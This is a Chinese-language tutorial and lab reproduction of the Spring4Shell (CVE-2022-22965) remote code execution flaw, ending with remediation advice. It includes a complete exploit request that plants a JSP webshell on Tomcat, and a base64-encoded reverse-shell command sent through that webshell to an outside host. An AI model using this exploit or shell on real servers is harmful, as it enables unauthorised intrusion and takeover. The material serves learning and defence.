Spring4Shell CVE-2022-22965原理及复现

Spring4Shell（正式编号为CVE-2022-22965）是 2022 年 3 月底发现的一个存在于Spring Framework中的远程代码执行（RCE）高危漏洞。由于 Spring 框架在 Java 生态中的核心地位，该漏洞曾引发了全行业的广泛关注，被不少人拿来与之前的 Log4Shell（Log4j 漏洞）相提并论。

漏洞原因与原理

核心原因：Spring 的参数绑定（Data Binding）机制存在缺陷，未能有效限制对敏感类属性的访问。

技术原理：

参数绑定：Spring 允许将 HTTP 请求参数自动映射到 Java 对象（POJO）的属性中。例如，请求?name=Tom会调用对象的setName("Tom")。
利用路径：在 JDK 9 及以上版本中，Java 引入了Module概念。通过对象属性导航，攻击者可以访问到class对象，进而访问module，再访问到classLoader。
- 利用链：class.module.classLoader
日志篡改（以 Tomcat 为例）：攻击者通过特制的 HTTP 请求，修改 Tomcat 服务器的AccessLogValve（访问日志控制类）的配置属性。
写入 WebShell：攻击者将日志的存储路径修改为 Web 目录，将日志后缀改为.jsp，并将日志内容（Pattern）设置为一段恶意的 JSP 代码。随后，只需访问一次该 URL，Tomcat 就会将这段恶意代码写入服务器磁盘，形成一个持久化的WebShell。

影响范围

要触发此漏洞，通常需要满足以下五个特定条件（这也是为什么它虽严重但不如 Log4j 易触发的原因）：

JDK 版本：JDK 9 或更高版本（因为需要module属性）。
框架版本：Spring Framework < 5.3.18 或 < 5.2.20。
依赖项：使用spring-webmvc或spring-webflux。
部署方式：以传统的WAR 包形式部署在Apache Tomcat上。如果使用 Spring Boot 默认的内嵌 Tomcat（JAR 包部署），默认配置下较难被直接利用。
参数传递：Controller 方法中使用了 POJO（普通 Java 对象）作为入参。

特定入口：必须是 Spring MVC 控制器中接收POJO 参数绑定的 HTTP 接口。
利用难度:中等：需要构造复杂的反射链，且目前公开最成熟的利用路径仅针对 Tomcat 容器。

Spring4Shell漏洞是基于CVE-2010-1622漏洞的绕过

CVE-2010-1622大致流程:

用class.classLoader获得ClassLoader类加载器，而在tomcat中类加器一般为org.apache.catalina.loader.WebappClassLoader它继承了URLClassLoader有一个getURLs()方法返回 URLs 的数组
springbean的内省机制，对于数组不需要 setter 方法也可以修改值，内部是 Array.set() 实现的
tomcat 的org.apache.jasper.compiler.TldLocationsCache会从WebappClassLoader里面读取urls参数并解析恶意的TLD文件，实现RCE
简化就是 :
通过springbean特性修改class.classLoader.URLs[0]数组的值 -> 由于jstl即 Java 服务器页面标准标签库 , Spring 在渲染 jsp 页面时，会去加载标签库.当受害机加载攻击者的远程类时,会解析攻击者构造的恶意TLD文件,实现RCE

漏洞修复
官方在springbean的加载时的CachedIntrospectionResults加入了对class.classLoader的判断

CVE-2022-22965（Spring4Shell）

jdk9 以后给Class加入了module属性，我们可以利用module获得ClassLoader, 也就是可以利用class.module.classLoader获得

可以本地搭建漏洞环境,执行以下代码,通过反射深度搜索查找,获取class.module.classLoader的利用链,打印出来

packagecom.lingx5.spring4shell.controller;importorg.springframework.stereotype.Controller;importorg.springframework.web.bind.annotation.RequestMapping;importjava.lang.reflect.InvocationTargetException;importjava.lang.reflect.Method;importjava.util.HashSet;@ControllerpublicclassProperController{@RequestMapping("/testclass")publicvoidclassTest(){HashSet<Object>set=newHashSet<Object>();Stringpoc="class.moduls.classLoader";Useraction=newUser();processClass(action.getClass().getClassLoader(),set,poc);}publicvoidprocessClass(Objectinstance,java.util.HashSetset,Stringpoc){try{Class<?>c=instance.getClass();set.add(instance);Method[]allMethods=c.getMethods();for(Methodm:allMethods){if(!m.getName().startsWith("set")){continue;}if(!m.toGenericString().startsWith("public")){continue;}Class<?>[]pType=m.getParameterTypes();if(pType.length!=1)continue;if(pType[0].getName().equals("java.lang.String")||pType[0].getName().equals("boolean")||pType[0].getName().equals("int")){StringfieldName=m.getName().substring(3,4).toLowerCase()+m.getName().substring(4);System.out.println(poc+"."+fieldName);}}for(Methodm:allMethods){if(!m.getName().startsWith("get")){continue;}if(!m.toGenericString().startsWith("public")){continue;}Class<?>[]pType=m.getParameterTypes();if(pType.length!=0)continue;if(m.getReturnType()==Void.TYPE)continue;m.setAccessible(true);Objecto=m.invoke(instance);if(o!=null){if(set.contains(o))continue;processClass(o,set,poc+"."+m.getName().substring(3,4).toLowerCase()+m.getName().substring(4));}}}catch(IllegalAccessException|InvocationTargetExceptionx){x.printStackTrace();}}}

发现获取了以下AccessValve属性

class.module.classLoader.resources.context.parent.pipeline.first.directory class.module.classLoader.resources.context.parent.pipeline.first.prefix class.module.classLoader.resources.context.parent.pipeline.first.suffix class.module.classLoader.resources.context.parent.pipeline.first.pattern class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat

什么是AccessLogValve？
在正常情况下，AccessLogValve（访问日志阀门）是 Apache Tomcat 提供的一个标准组件。它的唯一任务是：记录谁在什么时候访问了哪个网页。
server.xml中通常是这样配置

<ValveclassName="org.apache.tomcat.valves.AccessLogValve"directory="logs"prefix="localhost_access_log"suffix=".txt"pattern="%h %l %u %t&quot;%r&quot;%s %b"/>

directory: 日志存哪（默认是logs目录）。
prefix / suffix: 文件名叫什么（默认是localhost_access_log.txt）。
pattern: 记录什么内容（如：IP 地址、请求时间、状态码等）。

在这个漏洞起什么作用呢?
由于漏洞本身只是赋予了攻击者修改java对象属性的能力,所以需要找到可以通过属性修改控制服务器的利用路径,而AccessLogValve就是这条路径

漏洞攻击思路:

修改路径:通过漏洞吧directory修改成Web根目录(webapps/ROOT)
修改后缀:把后缀改成可以解析的代码后缀,把suffix从.txt改成.jsp.
注入:把pattern改为一段WebShell（JSP木马）

条件略有些苛刻
利用链严重依赖Tomcat,如果你用的是 Jetty 或其他服务器，它们没有AccessLogValve这个类，或者类结构不一样，攻击者的这条“写文件路径”就断了

漏洞复现

靶机环境（使用 vulhub靶场）：

克隆vulhub仓库gitclone --depth1https://github.com/vulhub/vulhub.git 到漏洞地址cdvulhub/spring/CVE-2022-22965

拉取镜像

docker-compose up -d

拉取失败的可以使用这个仓库的镜像源配置工具:

git clone https://github.com/hzhsec/docker_proxy.git chmod +x *.sh ./docker-proxy.sh

再拉取

docker-compose up -d

使用docker ps查看镜像是否运行
访问：http://靶机IP:8080

构造恶意请求

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1 Host: 192.168.1.100:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close suffix: %>// c1: Runtime c2: <% DNT: 1

payload解释:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}iif("j".equals(request.getParameter("pwd"))){java.io.InputStreamin=%{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream();inta=-1;byte[]b=newbyte[2048];while((a=in.read(b))!=-1){out.println(newString(b));}}%{suffix}i

class.module.classLoader.resources.context.parent.pipeline.first.pattern
这个属性作用是保存日志内容,这里通过请求包头部信息构造了jsp恶意代码,并回显

最终构造为

<% if("j".equals(request.getParameter("pwd"))){ Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream() 的输出通过out.println回显 } %>

class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp

修改日志保存后缀.jsp

class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT

修改日志保存根目录webapps/ROOT

&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar

将日志文件名前缀改为tomcatwar

class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

将dateFormat留空（避免带时间戳，文件名固定为tomcatwar.jsp）

发送数据包
浏览器插件是crapapi http接口调试插件,当然可以用burpsuit发送
测试是否执行命令

http://192.168.41.128:8080/tomcatwar.jsp?pwd=j&cmd=id

成功执行

测试反弹shell命令

bash-c{echo,YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4yMi4xNjcuMTY0LzQ0NDQgMD4mMQ}|{base64,-d}|{bash,-i}

将YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4yMi4xNjcuMTY0LzQ0NDQgMD4mMQ替换为自己的反弹命令

将命令url编码

http://192.168.41.128:8080/tomcatwar.jsp?pwd=j&cmd=bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4yMi4xNjcuMTY0LzQ0NDQgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D

反弹成功

漏洞修复建议

1.升级框架版本
这是最彻底的解决方案，Spring 官方已在后续版本中对参数绑定的类访问路径进行了严格的黑名单限制。

Spring Framework：
- 升级到5.3.18或更高版本。
- 升级到5.2.20或更高版本（针对 5.2.x 分支）。
Spring Boot：
- 升级到2.6.6或更高版本。
- 升级到2.5.12或更高版本。

2.环境降级
如果你的业务代码过于陈旧，无法立即升级 Spring 框架，可以通过改变运行环境来阻断漏洞链
降级 JDK：将运行环境回退到Java 8。

原理：Spring4Shell 的利用链依赖于 Java 9+ 引入的module属性。在 JDK 8 下，攻击者无法通过class.module访问到ClassLoader。

3.代码临时加固

在无法升级框架且必须使用 JDK 9+ 的情况下，可以在 Controller 中通过@InitBinder设置黑名单，禁止绑定敏感的属性路径。

@ControllerAdvice@Order(Ordered.HIGHEST_PRECEDENCE)publicclassSecurityAdvice{@InitBinderpublicvoidsetAllowedFields(WebDataBinderdataBinder){// 定义黑名单：禁止通过参数绑定访问 classLoader 和 cacheString[]denylist=newString[]{"class.*","Class.*","*.class.*","*.Class.*"};dataBinder.setDisallowedFields(denylist);}}